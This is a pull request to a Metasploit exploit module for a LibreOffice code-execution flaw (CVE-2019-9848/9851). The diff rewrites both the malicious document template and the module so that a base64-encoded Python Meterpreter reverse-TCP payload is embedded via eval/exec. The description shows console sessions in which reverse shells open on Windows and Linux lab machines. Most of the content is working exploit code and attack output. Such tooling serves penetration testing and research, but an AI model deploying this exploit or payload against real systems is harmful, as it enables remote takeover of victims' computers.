### PR TITLE
Use Python instead of platform-dependent code

### DIFF
--- a/data/exploits/CVE-2019-9848/librefile.erb
+++ b/data/exploits/CVE-2019-9848/librefile.erb
@@ -35,7 +35,7 @@
  </office:master-styles>
  <office:body>
   <office:text>
-  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>
+  <text:p text:style-name="P8"><%= @cmd %></text:p>
   <text:p text:style-name="Standard">#<%= text_content %></text:p>
   </office:text>
  </office:body>

--- a/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
@@ -7,8 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
-  include Msf::Exploit::Powershell
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -35,27 +33,17 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2019-9851' ],
           [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/' ]
         ],
-     'Platform'       => [ 'win', 'linux' ],
-     'Arch'           => [ ARCH_X86, ARCH_X64 ],
+     'Platform'       => 'python',
+     'Arch'           => ARCH_PYTHON,
      'Targets'        =>
         [
           [
-            'Windows',
+            'Windows / Linux',
             {
-              'Platform'        =>  'win',
-              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
-              'Payload'         =>  'windows/meterpreter/reverse_tcp',
+              'Platform'        =>  'python',
+              'Arch'            =>  ARCH_PYTHON,
+              'Payload'         =>  'python/meterpreter/reverse_tcp',
               'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
-            }
-          ],
-          [
-            'Linux',
-            {
-              'Platform'        =>  'linux',
-              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
-              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
-              'DefaultOptions'  =>  { 'PrependFork' =>  true },
-              'CmdStagerFlavor' =>  'printf',
             }
           ]
         ],
@@ -70,30 +58,12 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def encode_cmd
-    @cmd = Rex::Text.html_encode(@cmd)
-    @cmd = @cmd.gsub("&#x41;", "\\x41")
-  end
-
-  def gen_windows_cmd
-    opts =
-    {
-      :remove_comspec       =>  true,
-      :method               =>  'reflection',
-      :encode_final_payload =>  true
-    }
-    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
-  end
-
-  def gen_linux_cmd
-    @cmd = generate_cmdstager.first
-    @cmd = @cmd.gsub!("\\", "\\\\\\")
-    @cmd = @cmd.gsub!("'", "\"")
-  end
-
   def gen_file()
     text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
-    encode_cmd
+    @cmd = "eval(compile(\"#{payload.encoded}\", '', 'single'))"
+    py_code = Rex::Text.encode_base64(@cmd)
+    @cmd = "exec(eval(__import__('base64').b64decode('#{py_code}')))"
+    @cmd = Rex::Text.html_encode(@cmd)
 
     fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
     libre_file = ERB.new(fodt_file).result(binding())
@@ -106,13 +76,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if target.name == 'Windows'
-      gen_windows_cmd
-    elsif target.name == 'Linux'
-      gen_linux_cmd
-    else
-      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
-    end
     fodt_file = gen_file
 
     file_create(fodt_file)


### PR DESCRIPTION
This changes both the `odt` file and the exploit module to use Python code instead of system-specific code. Although this allows the module to be platform-independent, it also introduces a problem where an error window pops up when the Meterpreter session is closed. 

Tested on both Windows and Linux.

## Scenarios

```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (53755 bytes) to 192.168.37.147
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.147:49680) at 2019-08-16 15:30:32 -0500

meterpreter > getuid
Server username: DESKTOP-L5FDSM7\Shelby Pace
meterpreter > sysinfo
Computer        : DESKTOP-L5FDSM7
OS              : Windows 10 (Build 16299)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
```

```
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (53755 bytes) to 192.168.37.137
[*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.137:46668) at 2019-08-16 15:38:54 -0500

meterpreter > getuid
Server username: space
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
```